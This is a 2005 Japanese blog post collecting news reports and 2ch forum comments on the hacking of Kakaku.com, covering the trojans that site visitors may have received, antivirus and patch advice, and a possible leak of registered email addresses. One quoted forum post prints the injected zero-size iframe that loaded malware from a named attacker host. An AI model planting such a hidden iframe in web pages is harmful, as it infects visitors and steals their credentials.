2005年05月16日

価格.comがハッキングでサイト改ざん。価格comを見ていたらウイルス感染の可能性。メアド流出も?

Yahooニュースにも出ていたが価格.comがハッキングを受けたため閉鎖され、現在はWEBサーバーを変更して告知文を掲示しているが、日経コンピューターによると、価格コムを11日~14日にかけて閲覧したPCは2種類のウイルスに感染している恐れがあるとのこと。また価格comに登録したメールアドレスが「閲覧された形跡がありました」とのことなので、メアド流出もあったのかも。 [2005-05-16 09:53:58] 暫定まとめサイト
-

Yahooニュースにも出ていたが価格.comがハッキングを受けたサイトを改ざんされたため閉鎖され、現在はWEBサーバーを変更して告知文を掲示しているが、日経コンピューターによると、価格コムを11日~14日にかけて閲覧したPCは「trojandownloader.small.AAO」「PSW.Delf.FZ」の2種類のウイルスに感染している恐れがあるとのこと。
価格比較サイト「価格.com」を運営するカカクコムは5月15日、不正アクセスによる改ざんを受けたことで同サイトを一時閉鎖した事実を発表した。11日から14日にかけて、不正アクセスによる改ざんと対応を繰り返しており、その間にアクセスした顧客のパソコンは、ウイルスに感染した可能性がある。

 現時点で判明しているウイルスは「trojandownloader.small.AAO」と「PSW.Delf.FZ」の2種類。カカクコムによれば、ウイルス対策ソフト「NOD32」で対処が可能なことを確認している。他のウイルス対策ソフトについては、「最新の亜種と聞いており、正確な情報を得ることが難しい。現在セキュリティ・ソフト各社に確認中で、詳細が判明し次第、報告する」(同社)としている。
日経コンピューター


<これまでの経緯>
5月11日にプログラムの異常が発覚。調査したところ不正アクセスが原因であり、一種のサイバーテロ的な行為であると認識しました。
即時警察当局等とも相談し、24時間監視体制でサイト運営を続けながらプログラム改ざんの影響や対抗策、犯人の調査を続けて参りましたが不正アクセスは止まず、改ざんの範囲が拡大したため止む無く5月14日よりサイトを閉鎖しております。
価格コムの告知文より
価格comは11日の時点でなんらかの認識をしていたようなので、11日の時点でサイト閉鎖しなかったのは、閲覧者のウイルス感染の可能性を増やしたことになるので、マズイ感じ。

価格コムではメールアドレスやパスワード、性別、郵便番号、生年月日といった個人情報を登録することで価格.com IDを取得するようになっているが、 価格comの現在の告知ではメールアドレスが「閲覧された形跡がありました」ともあるので、メアドが流出したのかもしれない。
→ 【追記】名古屋・大須電波ニュースさん経由価格.comがクラッキングされた件(´・ω・)暫定まとめサイト
606 :名無しさん@5周年:2005/05/16(月) 02:39:27
まず、下記のリンクからIntelligent Updaterを使って最新のウイルス定義ファイルに更新しろ。
LiveUpdateの物ではだめだからな。
http://www.symantec.co.jp/region/jp/sarcj/defs.download.html


価格.COMのグーグルキャッシュ(メンテ前のもの)でソースを見てみると
<iframe src=http://www.j4sb.com/count/counter.ap?id=a02 width=0 height=0></iframe>
という行がある。

で、ttp://www.j4sb.com/count/counter.ap?id=a02にアクセスしに行くと、PWSteal.Lineageってトロイの木馬が検出される。
(WindowsUpdateをちゃんとしているWindowsなら大丈夫みたい。)

最新のウイルス定義ファイルにして、WindowsUpdateしておかないと、感染するからな、気をつけろよ。

608 :名無しさん@5周年:2005/05/16(月) 02:39:55
感染するのはIFRAME脆弱性パッチ
(去年の12月パッチであるKB889669)
を導入していないWindows+IEみたいだ

ただしWindows XP SP2は感染しない。FirefoxやOperaも感染しない
らしい
2ch kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染もss)

276 :名無しさん@5周年:2005/05/16(月) 08:28:39
kakaku.com が改ざんされ、ページを見ただけで感染するウイルスがページ上に掲載されていた模様。
ウイルス名はこの2つ
「trojandownloader.small.AAO」「PSW.Delf.FZ」

※対策
現在の所、どのブラウザだと感染するのか、どのアンチウイルスソフトだと検出・駆除できるのかがはっきりしておらず、
カカクコム側は、現在分かっているウイルスは eset NOD32 (日本代理店:キヤノンシステムソリューションズ) で
検出・駆除できるとしている。

そのためか、キヤノンのサイトが落ちており、肝心のNOD32がダウンロードできない状態になっている模様。
http://canon-sol.jp/product/nd/trial.html

eset (開発元) からNOD32をダウンロードすることは可能である。
http://www.nod32.com/download/trial.htm
とりあえず心配な方はこちらから。ただし、英語版しかない。

※よくある質問と答え(が正しいかは知らん)

Q.おれ○○○でウイルス対策してるけどこれじゃだめなの?
A.今の所、Norton AntiVirusの最新パッチ(パターン20050515-008)でも無理との報告有り、他も無理そう

Q.どういうウイルスなの
A. ttp://www.nod32-es.com/support/update_old_1921_1940.htm
  NOD32 - v.1.936 (20041130)
 Win32/TrojanDownloader.Small.AAO

 ttp://www.nod32-es.com/support/update.htm
  NOD32 - v.1.1093 (20050511)
  Win32/PSW.Delf.FZ

Q.個人情報流失?
A.上読んで
【ハッキング】価格.comがハッキングで閉鎖、閲覧者にウイルス感染の可能性も

【関連リンク】
価格コム 現在はサーバーを変更して閉鎖告知を案内
価格.comがクラッキングされた件(´・ω・)暫定まとめサイト

【速報】価格.comがハッキングで閉鎖、閲覧者にウイルス感染の可能性も
不正アクセスで「価格.com」閉鎖
価格.comを見た人はウイルス感染したかも
NHK 人気HP ウイルス仕込まれる

【関連2ちゃんねるスレッド】
kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も(ss)
kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も★2(ss)
【ハッキング】価格.comがハッキングで閉鎖、閲覧者にウイルス感染の可能性も(ss)
【ネット】"価格.com"、ハッキングで閉鎖。復旧に1週間…閲覧者、ウイルス感染か★4 (ss)
【ネット】"価格.com"、ハッキングで閉鎖。復旧に1週間…閲覧者、ウイルス感染か★5 (ss)

【価格コム関連】
カカクコム、サイトの完全復活を宣言、不正アクセス事件から2か月半ぶり (2005/08)
カカクコム、公衆無線LANサービスへ新規参入 - CNET Japan
カカクコム、「価格.com ID」導入でユーザー囲い込み
(株)カカクコム株価
カカクコムが4日ぶり急反落、サイバー攻撃に伴うウェブサイトの一時閉鎖を嫌気 (ss)

【関連記事】
価格.comウイルス事件「不安に感じたお客様よりお問い合わせ殺到中!」らしい
安売りだけに、ノー!「海外では、秋葉原はクレージーと言われています。」

[2005-05-16 09:53:58]

この記事はPC関連[2005] カテゴリーに含まれています |Ajax Amazon Edit
トラックバックURL
http://trackback.blogsys.jp/livedoor/geek/22135194
この記事へのトラックバック
ネットショップ女性客中心、女性の深層心理に与える影響が懸念される。
価格コム、サイバーテロが与える影響【評論、トラックバック、アフィリエイトもね?】at 2005年05月16日 10:19
Yahooニュースにも出ていましたが価格.comがハッキングを受け、サイト改ざんなどの被害により現在一時閉鎖中です。 http://www.kakaku.com/ 改ざんにより、何者かが価格.comを媒介としてウィルスソフトを無差別に送りつけ、閲覧者がウィルスファイルを取込んでしまった可能
価格.com ハッキングで一時閉鎖中!【ぱぁーぱ↑の技術向上委員会】at 2005年05月16日 10:41
 【重要なお知らせ】当社運営サイトに対する不正アクセスとサイト一時閉鎖に関してのご報告(価格.com トップページ)  PCやデジカメなどの安値情報を提供している「価格.com」が不正アクセスによるプログラム改竄が行われ、サイトを媒介してウィルスが送信された可能性
価格.com、不正アクセスで一時閉鎖に【kqtrain.net(blog)】at 2005年05月16日 11:02
結構便利で利用している価格.com 一昨日より閲覧不能だった状態が判明した。 サイバーテロに遭い一時的にページを閉鎖したらしい。 個人的には裏アキバ総研がどうなるか心配である。 最新情報はこちらのまとめページをどうぞ
価格.com サイバーテロに。【La Barzelletta 2nd】at 2005年05月16日 11:06
んー、ちょっと困った。 &lt;a herf=&quot;http://itpro.nikkeibp.co.jp/free/NC/NEWS/20050516/160843/index.shtml&quot;&gt;ITPro&lt;/a&gt;や&lt;a href=&quot;http://slashdot.jp/article.pl?sid=05/05/15/1644207&topic=1&mode=thread&quot;&gt;Slashdot&lt;/a&gt;です
価格.comがハッキングを受けたらしい【つれづれと駄文を垂れ流すブログ(仮)】at 2005年05月16日 11:20
【速報】価格.comがハッキングで閉鎖、閲覧者にウイルス感染の可能性も 価格.c
価格.comがハッキングで閉鎖、閲覧者にウイルス感染の可能性【てけとぉな blog】at 2005年05月16日 11:44
商品購入時に、価格の比較情報が得やすいことで 絶大な人気をほこる「価格.com」のサイトが 不正アクセスにより閲覧ページにウィルスが仕込 まれていたことが5/15に報じられた
速報 価格.comサイト、不正アクセスにより、ウィルスを埋め込まれる【名古屋・大須電波ニュース @愛知万博応援モード】at 2005年05月16日 12:42
会社でなにげに見てたこの記事 価格.comがハッキングでサイト改ざん。価格comを見ていたらウイルス感染の可能性。メアド流出も? 朝まさかとは思いノートン先生に診察を頼んで 健康体ですよ …と宣言されていたにもかかわらず 2chから抜粋された Q.お...
感染!!【ほんわかブログ】at 2005年05月16日 18:07
パソコンや携帯電話、家電製品などの安値を比較するサイト「価格.com」が5月11日からクラッキングを受け、現在閉鎖されているようです。ちょっとガクガクブルブルに恐いのは、ウィルスソフトを無差別に送りつけるように改ざんされてしまったとのこと。このサイトを11日以降最
◆価格.comウィルスにヤラれる【NFBLOG-釣れない君の週間毎日】at 2005年05月16日 18:46
様々な電化製品の市場価格をユーザーがランク付けをしていきマニアすらここのお世話になってる。そんな市場を紹介してきた。価格コムにサイバーテロがあったようです。「5月14日14時ごろより価格.comのサービス全てを現在まで停止しております。現在、一刻も早いサービス再開
kakaku.comにサイバーテロ!?【kito style】at 2005年05月16日 21:24
この下で書いた価格.comがハッキングを受け一時閉鎖になったのは、11日〓14日...
価格.com見ましたか?【ていこりらき】at 2005年05月16日 22:48
 すげーですね。吃驚。ひょっとして誰も彼もが感染していて、しかもメールアドレスを抜かれた被害者になっているかも!と思ったらWindowsの脆弱性狙いだったようです。  商品比較サイト「価格.com」を運営するカカクコムは5月16日、不正アクセスを受けて価格.comのプログラ
価格.comに不正アクセス【k-MT】at 2005年05月17日 00:52
昨日からスパムメールが来るようになったのですが、これも価格コム不正アクセスの件の可能性が大になってきました・・。 価格コムに登録した個人情報が流出したとの情報があります。 (メールアドレスのみとの情報が多いですが) これは価格コムにメールアドレスを登録
価格コム登録のメールアドレスが流出!実際スパムメールが来てます!【通販でお買いもの】at 2005年05月17日 05:22
俺もよく活用しているサイト 価格.COM がサイバーテロ的な不正アクセスにより プログラムが改ざんされ、サイトを媒介されてウィルスソフトを サイト閲覧者に無差別に送りつけるという被害があったらしい。 5月11日に異常が確認されたらしいのだが、15日に一時的閉鎖をし
価格.COM 一時閉鎖【YUMELOG】at 2005年05月17日 17:57
かの有名な価格比較サイトである 価格.comがハッキング(今回の場合はクラッキン
価格.comがハッキングされウィルス感染の恐れ【脱力計画】at 2005年05月17日 20:49
【 当社運営サイトを閲覧されたユーザーの方々へのセキュリティ対策のご報告 】 - 株式会社カカクコム - 【 価格 .com のウイルス、 MMORPG 「リネージュ」 起動中に活動することが判明 】 - Symantec - 【 価格 .com クラック対策 〜 可能性は低いが閲覧者はウイルス感染
やっぱり Windows Update はしないとね♪【パソコン初心者のために】at 2005年05月18日 01:57
ひげおやじの秘密小屋さんの 価格コムのセキュリティは最高レベルなんですか?という記事を 読む限り 価格.comは最高のセキュリティだったとコメントしているらしいが その価格.comから行けるウイルス情報をみると たとえばマカフィーのページを見ると 発見日(
価格.comを襲ったウイルスは2004年=1年前に流行した物?。最高のセキュリティって具体的には?【貧乏だけど心は萌え】at 2005年05月18日 03:00
初めてアンチウイルスソフトを購入しました。買ったのはこれ。■ NOD32 アンチウイルス (リニューアル版)Norton、ウイルスバスターなども考えてみたのですが、会社で使っていた時の「PC速度が遅くなって仕事にならない・・・」という体験を思い出して却下。今の最新版だった
NOD32 アンチウイルスソフト を購入【サイトの落とし穴】at 2005年06月04日 19:45
最近のインターネットでのセキュリティーが大きく問題になってる 価格.comでも被害はあったが、 DBのハッキングなんて、未だに対策されてない事がおおい → 記事:価格.comがハッキングでサイト改ざん。 → 記事:Firefoxマーケティングサイトがハッキング被害 → 記事.
ハニーポット【テクニカルラウンジ - livedoor Blog】at 2005年07月28日 03:16